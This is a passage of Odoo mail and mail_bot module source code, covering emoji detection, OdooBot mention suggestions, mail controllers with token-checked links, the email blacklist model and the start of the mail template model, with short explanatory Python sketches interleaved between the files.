range(0x269B, 0x269d),
range(0x26A0, 0x26a2),
range(0x26AA, 0x26ac),
range(0x26B0, 0x26b2),
range(0x26BD, 0x26bf),
range(0x26C4, 0x26c6),
range(0x26D3, 0x26d5),
range(0x26E9, 0x26eb),
range(0x26F0, 0x26f6),
range(0x26F7, 0x26fb),
range(0x2708, 0x270a),
range(0x270A, 0x270c),
range(0x270C, 0x270e),
range(0x2733, 0x2735),
range(0x2753, 0x2756),
range(0x2763, 0x2765),
range(0x2795, 0x2798),
range(0x2934, 0x2936),
range(0x2B05, 0x2b08),
range(0x2B1B, 0x2b1d),
range(0x1F170, 0x1f172),
range(0x1F191, 0x1f19b),
range(0x1F1E6, 0x1f200),
range(0x1F201, 0x1f203),
range(0x1F232, 0x1f23b),
range(0x1F250, 0x1f252),
range(0x1F300, 0x1f321),
range(0x1F324, 0x1f32d),
range(0x1F32D, 0x1f330),
range(0x1F330, 0x1f336),
range(0x1F337, 0x1f37d),
range(0x1F37E, 0x1f380),
range(0x1F380, 0x1f394),
range(0x1F396, 0x1f398),
range(0x1F399, 0x1f39c),
range(0x1F39E, 0x1f3a0),
range(0x1F3A0, 0x1f3c5),
range(0x1F3C6, 0x1f3cb),
range(0x1F3CB, 0x1f3cf),
range(0x1F3CF, 0x1f3d4),
range(0x1F3D4, 0x1f3e0),
range(0x1F3E0, 0x1f3f1),
range(0x1F3F3, 0x1f3f6),
range(0x1F3F8, 0x1f400),
range(0x1F400, 0x1f43f),
range(0x1F442, 0x1f4f8),
range(0x1F4F9, 0x1f4fd),
range(0x1F500, 0x1f53e),
range(0x1F549, 0x1f54b),
range(0x1F54B, 0x1f54f),
range(0x1F550, 0x1f568),
range(0x1F56F, 0x1f571),
range(0x1F573, 0x1f57a),
range(0x1F58A, 0x1f58e),
range(0x1F595, 0x1f597),
range(0x1F5B1, 0x1f5b3),
range(0x1F5C2, 0x1f5c5),
range(0x1F5D1, 0x1f5d4),
range(0x1F5DC, 0x1f5df),
range(0x1F5FB, 0x1f600),
range(0x1F601, 0x1f611),
range(0x1F612, 0x1f615),
range(0x1F61C, 0x1f61f),
range(0x1F620, 0x1f626),
range(0x1F626, 0x1f628),
range(0x1F628, 0x1f62c),
range(0x1F62E, 0x1f630),
range(0x1F630, 0x1f634),
range(0x1F635, 0x1f641),
range(0x1F641, 0x1f643),
range(0x1F643, 0x1f645),
range(0x1F645, 0x1f650),
range(0x1F680, 0x1f6c6),
range(0x1F6CB, 0x1f6d0),
range(0x1F6D1, 0x1f6d3),
range(0x1F6E0, 0x1f6e6),
range(0x1F6EB, 0x1f6ed),
range(0x1F6F4, 0x1f6f7),
range(0x1F6F7, 0x1f6f9),
range(0x1F910, 0x1f919),
range(0x1F919, 0x1f91f),
range(0x1F920, 0x1f928),
range(0x1F928, 0x1f930),
range(0x1F931, 0x1f933),
range(0x1F933, 0x1f93b),
range(0x1F93C, 0x1f93f),
range(0x1F940, 0x1f946),
range(0x1F947, 0x1f94c),
range(0x1F94D, 0x1f950),
range(0x1F950, 0x1f95f),
range(0x1F95F, 0x1f96c),
range(0x1F96C, 0x1f971),
range(0x1F973, 0x1f977),
range(0x1F97C, 0x1f980),
range(0x1F980, 0x1f985),
range(0x1F985, 0x1f992),
range(0x1F992, 0x1f998),
range(0x1F998, 0x1f9a3),
range(0x1F9B0, 0x1f9ba),
range(0x1F9C1, 0x1f9c3),
range(0x1F9D0, 0x1f9e7),
range(0x1F9E7, 0x1fa00),
[0x2328, 0x23cf, 0x24c2, 0x25b6, 0x25c0, 0x260e, 0x2611, 0x2618, 0x261d, 0x2620, 0x2626,
0x262a, 0x2640, 0x2642, 0x2663, 0x2668, 0x267b, 0x2699, 0x26c8, 0x26ce, 0x26cf,
0x26d1, 0x26fd, 0x2702, 0x2705, 0x270f, 0x2712, 0x2714, 0x2716, 0x271d, 0x2721, 0x2728, 0x2744, 0x2747, 0x274c,
0x274e, 0x2757, 0x27a1, 0x27b0, 0x27bf, 0x2b50, 0x2b55, 0x3030, 0x303d, 0x3297, 0x3299, 0x1f004, 0x1f0cf, 0x1f17e,
0x1f17f, 0x1f18e, 0x1f21a, 0x1f22f, 0x1f321, 0x1f336, 0x1f37d, 0x1f3c5, 0x1f3f7, 0x1f43f, 0x1f440, 0x1f441, 0x1f4f8,
0x1f4fd, 0x1f4ff, 0x1f57a, 0x1f587, 0x1f590, 0x1f5a4, 0x1f5a5, 0x1f5a8, 0x1f5bc, 0x1f5e1, 0x1f5e3, 0x1f5e8, 0x1f5ef,
0x1f5f3, 0x1f5fa, 0x1f600, 0x1f611, 0x1f615, 0x1f616, 0x1f617, 0x1f618, 0x1f619, 0x1f61a, 0x1f61b, 0x1f61f, 0x1f62c,
0x1f62d, 0x1f634, 0x1f6d0, 0x1f6e9, 0x1f6f0, 0x1f6f3, 0x1f6f9, 0x1f91f, 0x1f930, 0x1f94c, 0x1f97a, 0x1f9c0]
)
if any(chr(emoji) in body for emoji in emoji_list):
return True
return False
def _is_bot_pinged(self, values):
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
return (4, odoobot_id) in values.get('partner_ids', [])
def _is_bot_in_private_channel(self, record):
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
if record._name == 'mail.channel' and record.channel_type == 'chat':
return odoobot_id in record.with_context(active_test=False).channel_partner_ids.ids
return False
```
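`_body_contains_emoji` works by flattening a long list of Unicode ranges and single code points, then testing the message body against it. The shape of that check, reduced to a handful of ranges (the selection below is illustrative, not the full table from the module):
```python
import itertools

EMOJI_CODEPOINTS = set(itertools.chain(
    range(0x1F600, 0x1F650),   # emoticons block
    range(0x2600, 0x2605),     # a few miscellaneous symbols
    [0x2764],                  # heavy black heart
))

def body_contains_emoji(body):
    return any(ord(char) in EMOJI_CODEPOINTS for char in body)

assert body_contains_emoji(u"hello \U0001F601")
assert not body_contains_emoji(u"hello world")
```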
#### File: mail_bot/models/res_partner.py
```python
from odoo import api, models
class Partner(models.Model):
_inherit = 'res.partner'
def _compute_im_status(self):
# we assume that mail_bot's _compute_im_status will be executed after bus's _compute_im_status
super(Partner, self)._compute_im_status()
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
for partner in self:
if partner.id == odoobot_id:
partner.im_status = 'bot'
@api.model
def get_mention_suggestions(self, search, limit=8):
#add odoobot in mention suggestion when pinging in mail_thread
[users, partners] = super(Partner, self).get_mention_suggestions(search, limit=limit)
if len(partners) + len(users) < limit and "odoobot".startswith(search.lower()):
odoobot = self.env.ref("base.partner_root")
if not any([elem['id'] == odoobot.id for elem in partners]):
if odoobot:
partners.append({'id': odoobot.id, 'name': odoobot.name, 'email': odoobot.email})
return [users, partners]
```
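The override is small: OdooBot is appended to the partner suggestions when the typed prefix matches "odoobot", the limit is not already reached, and the bot is not already listed. The same rule on plain data (ids and names invented for the sketch):
```python
ODOOBOT = {'id': 2, 'name': 'OdooBot', 'email': 'odoobot@example.com'}  # hypothetical record

def add_odoobot_suggestion(search, partners, limit=8):
    if len(partners) < limit and "odoobot".startswith(search.lower()):
        if not any(p['id'] == ODOOBOT['id'] for p in partners):
            partners.append(ODOOBOT)
    return partners

assert add_odoobot_suggestion('odo', [])[0]['name'] == 'OdooBot'
assert add_odoobot_suggestion('alice', []) == []
```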
#### File: mail/controllers/main.py
```python
import base64
import logging
import psycopg2
import werkzeug
from werkzeug import url_encode
from odoo import api, http, registry, SUPERUSER_ID, _
from odoo.addons.web.controllers.main import binary_content
from odoo.exceptions import AccessError
from odoo.http import request
from odoo.tools import consteq, pycompat
_logger = logging.getLogger(__name__)
class MailController(http.Controller):
_cp_path = '/mail'
@classmethod
def _redirect_to_messaging(cls):
url = '/web#%s' % url_encode({'action': 'mail.action_discuss'})
return werkzeug.utils.redirect(url)
@classmethod
def _check_token(cls, token):
base_link = request.httprequest.path
params = dict(request.params)
params.pop('token', '')
valid_token = request.env['mail.thread']._notify_encode_link(base_link, params)
return consteq(valid_token, str(token))
@classmethod
def _check_token_and_record_or_redirect(cls, model, res_id, token):
comparison = cls._check_token(token)
if not comparison:
_logger.warning(_('Invalid token in route %s') % request.httprequest.url)
return comparison, None, cls._redirect_to_messaging()
try:
record = request.env[model].browse(res_id).exists()
except Exception:
record = None
redirect = cls._redirect_to_messaging()
else:
redirect = cls._redirect_to_record(model, res_id)
return comparison, record, redirect
@classmethod
def _redirect_to_record(cls, model, res_id, access_token=None, **kwargs):
# access_token and kwargs are used in the portal controller override for the Send by email or Share Link
# to give access to the record to a recipient that has normally no access.
uid = request.session.uid
# no model / res_id, meaning no possible record -> redirect to login
if not model or not res_id or model not in request.env:
return cls._redirect_to_messaging()
# find the access action using sudo to have the details about the access link
RecordModel = request.env[model]
record_sudo = RecordModel.sudo().browse(res_id).exists()
if not record_sudo:
# record does not seem to exist -> redirect to login
return cls._redirect_to_messaging()
# the record has a window redirection: check access rights
if uid is not None:
if not RecordModel.sudo(uid).check_access_rights('read', raise_exception=False):
return cls._redirect_to_messaging()
try:
record_sudo.sudo(uid).check_access_rule('read')
except AccessError:
return cls._redirect_to_messaging()
else:
record_action = record_sudo.get_access_action(access_uid=uid)
else:
record_action = record_sudo.get_access_action()
if record_action['type'] == 'ir.actions.act_url' and record_action.get('target_type') != 'public':
return cls._redirect_to_messaging()
record_action.pop('target_type', None)
# the record has an URL redirection: use it directly
if record_action['type'] == 'ir.actions.act_url':
return werkzeug.utils.redirect(record_action['url'])
# other choice: act_window (no support of anything else currently)
elif not record_action['type'] == 'ir.actions.act_window':
return cls._redirect_to_messaging()
url_params = {
'view_type': record_action['view_type'],
'model': model,
'id': res_id,
'active_id': res_id,
'action': record_action.get('id'),
}
view_id = record_sudo.get_formview_id()
if view_id:
url_params['view_id'] = view_id
url = '/web?#%s' % url_encode(url_params)
return werkzeug.utils.redirect(url)
@http.route('/mail/receive', type='json', auth='none')
def receive(self, req):
""" End-point to receive mail from an external SMTP server. """
dbs = req.jsonrequest.get('databases')
for db in dbs:
message = base64.b64decode(dbs[db])
try:
db_registry = registry(db)
with db_registry.cursor() as cr:
env = api.Environment(cr, SUPERUSER_ID, {})
env['mail.thread'].message_process(None, message)
except psycopg2.Error:
pass
return True
@http.route('/mail/read_followers', type='json', auth='user')
def read_followers(self, follower_ids, res_model):
followers = []
is_editable = request.env['mail.followers'].user_has_groups('base.group_no_one')
partner_id = request.env.user.partner_id
follower_id = None
follower_recs = request.env['mail.followers'].sudo().browse(follower_ids)
res_ids = follower_recs.mapped('res_id')
request.env[res_model].browse(res_ids).check_access_rule("read")
for follower in follower_recs:
is_uid = partner_id == follower.partner_id
follower_id = follower.id if is_uid else follower_id
followers.append({
'id': follower.id,
'name': follower.partner_id.name or follower.channel_id.name,
'email': follower.partner_id.email if follower.partner_id else None,
'res_model': 'res.partner' if follower.partner_id else 'mail.channel',
'res_id': follower.partner_id.id or follower.channel_id.id,
'is_editable': is_editable,
'is_uid': is_uid,
})
return {
'followers': followers,
'subtypes': self.read_subscription_data(res_model, follower_id) if follower_id else None
}
@http.route('/mail/read_subscription_data', type='json', auth='user')
def read_subscription_data(self, res_model, follower_id):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
followers = request.env['mail.followers'].browse(follower_id)
# find current model subtypes, add them to a dictionary
subtypes = request.env['mail.message.subtype'].search(['&', ('hidden', '=', False), '|', ('res_model', '=', res_model), ('res_model', '=', False)])
subtypes_list = [{
'name': subtype.name,
'res_model': subtype.res_model,
'sequence': subtype.sequence,
'default': subtype.default,
'internal': subtype.internal,
'followed': subtype.id in followers.mapped('subtype_ids').ids,
'parent_model': subtype.parent_id.res_model,
'id': subtype.id
} for subtype in subtypes]
subtypes_list = sorted(subtypes_list, key=lambda it: (it['parent_model'] or '', it['res_model'] or '', it['internal'], it['sequence']))
return subtypes_list
@http.route('/mail/view', type='http', auth='none')
def mail_action_view(self, model=None, res_id=None, access_token=None, **kwargs):
""" Generic access point from notification emails. The heuristic to
choose where to redirect the user is the following :
- find a public URL
- if none found
- users with a read access are redirected to the document
- users without read access are redirected to the Messaging
- not logged users are redirected to the login page
models that have an access_token may apply variations on this.
"""
# ==============================================================================================
# This block of code disappeared on saas-11.3 to be reintroduced by TBE.
# This is needed because after a migration from an older version to saas-11.3, the link
# received by mail with a message_id no longer works.
# So this block of code is needed to guarantee the backward compatibility of those links.
if kwargs.get('message_id'):
try:
message = request.env['mail.message'].sudo().browse(int(kwargs['message_id'])).exists()
except:
message = request.env['mail.message']
if message:
model, res_id = message.model, message.res_id
# ==============================================================================================
if res_id and isinstance(res_id, pycompat.string_types):
res_id = int(res_id)
return self._redirect_to_record(model, res_id, access_token, **kwargs)
@http.route('/mail/assign', type='http', auth='user', methods=['GET'])
def mail_action_assign(self, model, res_id, token=None):
comparison, record, redirect = self._check_token_and_record_or_redirect(model, int(res_id), token)
if comparison and record:
try:
record.write({'user_id': request.uid})
except Exception:
return self._redirect_to_messaging()
return redirect
@http.route('/mail/<string:res_model>/<int:res_id>/avatar/<int:partner_id>', type='http', auth='public')
def avatar(self, res_model, res_id, partner_id):
headers = [('Content-Type', 'image/png')]
status = 200
content = 'R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==' # default image is one white pixel
if res_model in request.env:
try:
# if the current user has access to the document, get the partner avatar as sudo()
request.env[res_model].browse(res_id).check_access_rule('read')
if partner_id in request.env[res_model].browse(res_id).sudo().exists().message_ids.mapped('author_id').ids:
status, headers, _content = binary_content(model='res.partner', id=partner_id, field='image_medium', default_mimetype='image/png', env=request.env(user=SUPERUSER_ID))
# binary content return an empty string and not a placeholder if obj[field] is False
if _content != '':
content = _content
if status == 304:
return werkzeug.wrappers.Response(status=304)
except AccessError:
pass
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status = str(status)
return response
@http.route('/mail/needaction', type='json', auth='user')
def needaction(self):
return request.env['res.partner'].get_needaction_count()
@http.route('/mail/init_messaging', type='json', auth='user')
def mail_init_messaging(self):
values = {
'needaction_inbox_counter': request.env['res.partner'].get_needaction_count(),
'starred_counter': request.env['res.partner'].get_starred_count(),
'channel_slots': request.env['mail.channel'].channel_fetch_slot(),
'mail_failures': request.env['mail.message'].message_fetch_failed(),
'commands': request.env['mail.channel'].get_mention_commands(),
'mention_partner_suggestions': request.env['res.partner'].get_static_mention_suggestions(),
'shortcodes': request.env['mail.shortcode'].sudo().search_read([], ['source', 'substitution', 'description']),
'menu_id': request.env['ir.model.data'].xmlid_to_res_id('mail.menu_root_discuss'),
'is_moderator': request.env.user.is_moderator,
'moderation_counter': request.env.user.moderation_counter,
'moderation_channel_ids': request.env.user.moderation_channel_ids.ids,
}
return values
```
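`/mail/assign` trusts a link only if `_check_token` can re-derive the same token from the path and parameters and compare it in constant time (`consteq`). A standalone sketch of that pattern; the HMAC construction below is an assumption for the demo, the real derivation lives in `mail.thread._notify_encode_link`:
```python
import hashlib
import hmac

SECRET = b'database-secret'   # invented for the example

def encode_link(base_link, params):
    payload = base_link + '|' + repr(sorted(params.items()))
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()

def check_token(token, base_link, params):
    params = {k: v for k, v in params.items() if k != 'token'}   # params.pop('token', '')
    return hmac.compare_digest(encode_link(base_link, params), str(token))

good = encode_link('/mail/assign', {'model': 'crm.lead', 'res_id': 42})
assert check_token(good, '/mail/assign', {'model': 'crm.lead', 'res_id': 42, 'token': good})
assert not check_token('tampered', '/mail/assign', {'model': 'crm.lead', 'res_id': 42})
```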
#### File: mail/models/mail_blacklist.py
```python
import logging
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class MailBlackList(models.Model):
""" Model of blacklisted email addresses to stop sending emails."""
_name = 'mail.blacklist'
_inherit = ['mail.thread']
_description = 'Mail Blacklist'
_rec_name = 'email'
email = fields.Char(string='Email Address', required=True, index=True, help='This field is case insensitive.',
track_visibility=True)
active = fields.Boolean(default=True, track_visibility=True)
_sql_constraints = [
('unique_email', 'unique (email)', 'Email address already exists!')
]
@api.model_create_multi
def create(self, values):
# First of all, extract values to ensure emails are really unique (and don't modify values in place)
new_values = []
all_emails = []
for value in values:
email = self._sanitize_email(value.get('email'))
if not email:
raise UserError(_('Invalid email address %r') % value['email'])
if email in all_emails:
continue
all_emails.append(email)
new_value = dict(value, email=email)
new_values.append(new_value)
""" To avoid crash during import due to unique email, return the existing records if any """
sql = '''SELECT email, id FROM mail_blacklist WHERE email = ANY(%s)'''
emails = [v['email'] for v in new_values]
self._cr.execute(sql, (emails,))
bl_entries = dict(self._cr.fetchall())
to_create = [v for v in new_values
if v['email'] not in bl_entries]
# TODO DBE Fixme : reorder ids according to incoming ids.
results = super(MailBlackList, self).create(to_create)
return self.env['mail.blacklist'].browse(bl_entries.values()) | results
@api.multi
def write(self, values):
if 'email' in values:
values['email'] = self._sanitize_email(values['email'])
return super(MailBlackList, self).write(values)
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
""" Override _search in order to grep search on email field and make it
lower-case and sanitized """
if args:
new_args = []
for arg in args:
if isinstance(arg, (list, tuple)) and arg[0] == 'email' and isinstance(arg[2], tools.pycompat.text_type):
sanitized = self.env['mail.blacklist']._sanitize_email(arg[2])
if sanitized:
new_args.append([arg[0], arg[1], sanitized])
else:
new_args.append(arg)
else:
new_args.append(arg)
else:
new_args = args
return super(MailBlackList, self)._search(new_args, offset=offset, limit=limit, order=order, count=count, access_rights_uid=access_rights_uid)
def _add(self, email):
sanitized = self._sanitize_email(email)
record = self.env["mail.blacklist"].with_context(active_test=False).search([('email', '=', sanitized)])
if len(record) > 0:
record.write({'active': True})
else:
record = self.create({'email': email})
return record
def _remove(self, email):
sanitized = self._sanitize_email(email)
record = self.env["mail.blacklist"].with_context(active_test=False).search([('email', '=', sanitized)])
if len(record) > 0:
record.write({'active': False})
else:
record = record.create({'email': email, 'active': False})
return record
def _sanitize_email(self, email):
""" Sanitize and standardize blacklist entries: all emails should be
only real email extracted from strings (A <a@a> -> a@a) and should be
lower case. """
emails = tools.email_split(email)
if not emails or len(emails) != 1:
return False
return emails[0].lower()
class MailBlackListMixin(models.AbstractModel):
""" Mixin that is inherited by all model with opt out.
USAGE : the field '_primary_email' must be overridden in the model that inherit the mixin
and must contain the email field of the model.
"""
_name = 'mail.blacklist.mixin'
_description = 'Mail Blacklist mixin'
_primary_email = ['email']
# Note: is_blacklisted should only be used for display. As the compute does not depend on the blacklist,
# once read, it won't be re-computed again if the blacklist is modified in the same request.
is_blacklisted = fields.Boolean(string='Blacklist', compute="_compute_is_blacklisted", compute_sudo=True,
store=False, search="_search_is_blacklisted", groups="base.group_user",
help="If the email address is on the blacklist, the contact won't receive mass mailing anymore, from any list")
def _assert_primary_email(self):
if not hasattr(self, "_primary_email") or \
not isinstance(self._primary_email, (list, tuple)) or \
not len(self._primary_email) == 1:
raise UserError(_('Invalid primary email field on model %s') % self._name)
field_name = self._primary_email[0]
if field_name not in self._fields or self._fields[field_name].type != 'char':
raise UserError(_('Invalid primary email field on model %s') % self._name)
@api.model
def _search_is_blacklisted(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
self._assert_primary_email()
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
[email_field] = self._primary_email
if value:
query = """
SELECT m.id
FROM mail_blacklist bl
JOIN %s m
ON (LOWER(substring(m.%s, '([^ ,;<@]+@[^> ,;]+)')) = bl.email AND bl.active)
"""
else:
query = """
SELECT m.id
FROM %s m
LEFT JOIN mail_blacklist bl
ON (LOWER(substring(m.%s, '([^ ,;<@]+@[^> ,;]+)')) = bl.email AND bl.active)
WHERE bl.id IS NULL
"""
self._cr.execute(query % (self._table, email_field))
res = self._cr.fetchall()
if not res:
return [(0, '=', 1)]
return [('id', 'in', [r[0] for r in res])]
@api.depends(lambda self: self._primary_email)
def _compute_is_blacklisted(self):
self._assert_primary_email()
[email_field] = self._primary_email
# TODO: Should remove the sudo as compute_sudo is defined on the field.
# But if the user doesn't have access to mail.blacklist, it doesn't work without sudo().
sanitized = [self.env['mail.blacklist']._sanitize_email(email) for email in self.mapped(email_field)]
blacklist = set(self.env['mail.blacklist'].sudo().search([('email', 'in', sanitized)]).mapped('email'))
for record in self:
record.is_blacklisted = self.env['mail.blacklist']._sanitize_email(record[email_field]) in blacklist
```
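Everything in this model funnels through `_sanitize_email`: an entry is kept only when exactly one address can be extracted, and it is stored lower-cased. The same rule without `odoo.tools.email_split`, using the standard library instead (a sketch, not the module's code):
```python
from email.utils import getaddresses

def sanitize_email(value):
    addresses = [addr for _name, addr in getaddresses([value or '']) if '@' in addr]
    if len(addresses) != 1:
        return False
    return addresses[0].lower()

assert sanitize_email('Raoul <RAOUL@Example.COM>') == 'raoul@example.com'
assert sanitize_email('not an email') is False
assert sanitize_email('a@b.com, c@d.com') is False   # ambiguous entries are rejected
```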
#### File: mail/models/mail_template.py
```python
import babel
import base64
import copy
import datetime
import dateutil.relativedelta as relativedelta
import logging
import functools
import lxml
from werkzeug import urls
from odoo import _, api, fields, models, tools
from odoo.exceptions import UserError
from odoo.tools import pycompat
_logger = logging.getLogger(__name__)
def format_date(env, date, pattern=False):
if not date:
return ''
try:
return tools.format_date(env, date, date_format=pattern)
except babel.core.UnknownLocaleError:
return date
def format_tz(env, dt, tz=False, format=False):
record_user_timestamp = env.user.sudo().with_context(tz=tz or env.user.sudo().tz or 'UTC')
timestamp = fields.Datetime.from_string(dt)
ts = fields.Datetime.context_timestamp(record_user_timestamp, timestamp)
# Babel allows to format datetime in a specific language without change locale
# So month 1 = January in English, and janvier in French
# Be aware that the default value for format is 'medium', instead of 'short'
# medium: Jan 5, 2016, 10:20:31 PM | 5 janv. 2016 22:20:31
# short: 1/5/16, 10:20 PM | 5/01/16 22:20
if env.context.get('use_babel'):
# Formatting available here : http://babel.pocoo.org/en/latest/dates.html#date-fields
from babel.dates import format_datetime
return format_datetime(ts, format or 'medium', locale=env.context.get("lang") or 'en_US')
if format:
return pycompat.text_type(ts.strftime(format))
else:
lang = env.context.get("lang")
langs = env['res.lang']
if lang:
langs = env['res.lang'].search([("code", "=", lang)])
format_date = langs.date_format or '%B-%d-%Y'
format_time = langs.time_format or '%I-%M %p'
fdate = pycompat.text_type(ts.strftime(format_date))
ftime = pycompat.text_type(ts.strftime(format_time))
return u"%s %s%s" % (fdate, ftime, (u' (%s)' % tz) if tz else u'')
def format_amount(env, amount, currency):
fmt = "%.{0}f".format(currency.decimal_places)
lang = env['res.lang']._lang_get(env.context.get('lang') or 'en_US')
formatted_amount = lang.format(fmt, currency.round(amount), grouping=True, monetary=True)\
.replace(r' ', u'\N{NO-BREAK SPACE}').replace(r'-', u'-\N{ZERO WIDTH NO-BREAK SPACE}')
pre = post = u''
if currency.position == 'before':
pre = u'{symbol}\N{NO-BREAK SPACE}'.format(symbol=currency.symbol or '')
else:
post = u'\N{NO-BREAK SPACE}{symbol}'.format(symbol=currency.symbol or '')
return u'{pre}{0}{post}'.format(formatted_amount, pre=pre, post=post)
try:
# We use a jinja2 sandboxed environment to render mako templates.
# Note that the rendering does not cover all the mako syntax, in particular
# arbitrary Python statements are not accepted, and not all expressions are
# allowed: only "public" attributes (not starting with '_') of objects may
# be accessed.
# This is done on purpose: it prevents incidental or malicious execution of
# Python code that may break the security of the server.
from jinja2.sandbox import SandboxedEnvironment
mako_template_env = SandboxedEnvironment(
block_start_string="<%",
block_end_string="%>",
variable_start_string="${",
variable_end_string="}",
comment_start_string="<%doc>",
comment_end_string="</%doc>",
line_statement_prefix="%",
line_comment_prefix="##",
trim_blocks=True, # do not output newline after blocks
autoescape=True, # XML/HTML automatic escaping
)
mako_template_env.globals.update({
'str': str,
'quote': urls.url_quote,
'urlencode': urls.url_encode,
'datetime': datetime,
'len': len,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'filter': filter,
'reduce': functools.reduce,
'map': map,
'round': round,
# dateutil.relativedelta is an old-style class and cannot be directly
# instantiated within a jinja2 expression, so a lambda "proxy"
# is needed, apparently.
'relativedelta': lambda *a, **kw : relativedelta.relativedelta(*a, **kw),
})
mako_safe_template_env = copy.copy(mako_template_env)
mako_safe_template_env.autoescape = False
except ImportError:
_logger.warning("jinja2 not available, templating features will not work!")
class MailTemplate(models.Model):
"Templates for sending email"
_name = "mail.template"
_description = 'Email Templates'
_order = 'name'
@api.model
def default_get(self, fields):
res = super(MailTemplate, self).default_get(fields)
if res.get('model'):
res['model_id'] = self.env['ir.model']._get(res.pop('model')).id
return res
name = fields.Char('Name')
model_id = fields.Many2one('ir.model', 'Applies to', help="The type of document this template can be used with")
model = fields.Char('Related Document Model', related='model_id.model', index=True, store=True, readonly=True)
lang = fields.Char('Language',
help="Optional translation language (ISO code) to select when sending out an email. "
"If not set, the english version will be used. "
"This should usually be a placeholder expression "
"that provides the appropriate language, e.g. "
"${object.partner_id.lang}.",
placeholder="${object.partner_id.lang}")
user_signature = fields.Boolean('Add Signature',
help="If checked, the user's signature will be appended to the text version "
"of the message")
subject = fields.Char('Subject', translate=True, help="Subject (placeholders may be used here)")
email_from = fields.Char('From',
help="Sender address (placeholders may be used here). If not set, the default "
"value will be the author's email alias if configured, or email address.")
use_default_to = fields.Boolean(
'Default recipients',
help="Default recipients of the record:\n"
"- partner (using id on a partner or the partner_id field) OR\n"
"- email (using email_from or email field)")
email_to = fields.Char('To (Emails)', help="Comma-separated recipient addresses (placeholders may be used here)")
partner_to = fields.Char('To (Partners)', oldname='email_recipients',
help="Comma-separated ids of recipient partners (placeholders may be used here)")
email_cc = fields.Char('Cc', help="Carbon copy recipients (placeholders may be used here)")
reply_to = fields.Char('Reply-To', help="Preferred response address (placeholders may be used here)")
mail_server_id = fields.Many2one('ir.mail_server', 'Outgoing Mail Server', readonly=False,
help="Optional preferred server for outgoing mails. If not set, the highest "
"priority one will be used.")
body_html = fields.Html('Body', translate=True, sanitize=False)
report_name = fields.Char('Report Filename', translate=True,
help="Name to use for the generated report file (may contain placeholders)\n"
"The extension can be omitted and will then come from the report type.")
report_template = fields.Many2one('ir.actions.report', 'Optional report to print and attach')
ref_ir_act_window = fields.Many2one('ir.actions.act_window', 'Sidebar action', readonly=True, copy=False,
help="Sidebar action to make this template available on records "
"of the related document model")
attachment_ids = fields.Many2many('ir.attachment', 'email_template_attachment_rel', 'email_template_id',
'attachment_id', 'Attachments',
help="You may attach files to this template, to be added to all "
"emails created from this template")
auto_delete = fields.Boolean('Auto Delete', default=True, help="Permanently delete this email after sending it, to save space")
# Fake fields used to implement the placeholder assistant
model_object_field = fields.Many2one('ir.model.fields', string="Field",
help="Select target field from the related document model.\n"
"If it is a relationship field you will be able to select "
"a target field at the destination of the relationship.")
sub_object = fields.Many2one('ir.model', 'Sub-model', readonly=True,
help="When a relationship field is selected as first field, "
"this field shows the document model the relationship goes to.")
sub_model_object_field = fields.Many2one('ir.model.fields', 'Sub-field',
help="When a relationship field is selected as first field, "
"this field lets you select the target field within the "
"destination document model (sub-model).")
null_value = fields.Char('Default Value', help="Optional value to use if the target field is empty")
copyvalue = fields.Char('Placeholder Expression', help="Final placeholder expression, to be copy-pasted in the desired template field.")
scheduled_date = fields.Char('Scheduled Date', help="If set, the queue manager will send the email after the date. If not set, the email will be sent as soon as possible. Jinja2 placeholders may be used.")
@api.onchange('model_id')
def onchange_model_id(self):
# TDE CLEANME: shouldn't it be a stored related field?
if self.model_id:
self.model = self.model_id.model
else:
self.model = False
def build_expression(self, field_name, sub_field_name, null_value):
"""Returns a placeholder expression for use in a template field,
based on the values provided in the placeholder assistant.
:param field_name: main field name
:param sub_field_name: sub field name (M2O)
:param null_value: default value if the target value is empty
:return: final placeholder expression """
expression = ''
if field_name:
expression = "${object." + field_name
if sub_field_name:
expression += "." + sub_field_name
if null_value:
expression += " or '''%s'''" % null_value
expression += "}"
return expression
@api.onchange('model_object_field', 'sub_model_object_field', 'null_value')
def onchange_sub_model_object_value_field(self):
if self.model_object_field:
if self.model_object_field.ttype in ['many2one', 'one2many', 'many2many']:
model = self.env['ir.model']._get(self.model_object_field.relation)
if model:
self.sub_object = model.id
self.copyvalue = self.build_expression(self.model_object_field.name, self.sub_model_object_field and self.sub_model_object_field.name or False, self.null_value or False)
else:
self.sub_object = False
self.sub_model_object_field = False
self.copyvalue = self.build_expression(self.model_object_field.name, False, self.null_value or False)
else:
self.sub_object = False
self.copyvalue = False
self.sub_model_object_field = False
self.null_value = False
@api.multi
def unlink(self):
self.unlink_action()
return super(MailTemplate, self).unlink()
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
default = dict(default or {},
name=_("%s (copy)") % self.name)
return super(MailTemplate, self).copy(default=default)
@api.multi
def unlink_action(self):
for template in self:
if template.ref_ir_act_window:
template.ref_ir_act_window.unlink()
return True
@api.multi
def create_action(self):
ActWindow = self.env['ir.actions.act_window']
view = self.env.ref('mail.email_compose_message_wizard_form')
for template in self:
button_name = _('Send Mail (%s)') % template.name
action = ActWindow.create({
'name': button_name,
'type': 'ir.actions.act_window',
'res_model': 'mail.compose.message',
'src_model': template.model_id.model,
'view_type': 'form',
'context': "{'default_composition_mode': 'mass_mail', 'default_template_id' : %d, 'default_use_template': True}" % (template.id),
'view_mode': 'form,tree',
'view_id': view.id,
'target': 'new',
'binding_model_id': template.model_id.id,
})
template.write({'ref_ir_act_window': action.id})
return True
# ----------------------------------------
# RENDERING
# ----------------------------------------
@api.model
def render_post_process(self, html):
html = self.env['mail.thread']._replace_local_links(html)
return html
@api.model
def _render_template(self, template_txt, model, res_ids, post_process=False):
""" Render the given template text, replace mako expressions ``${expr}``
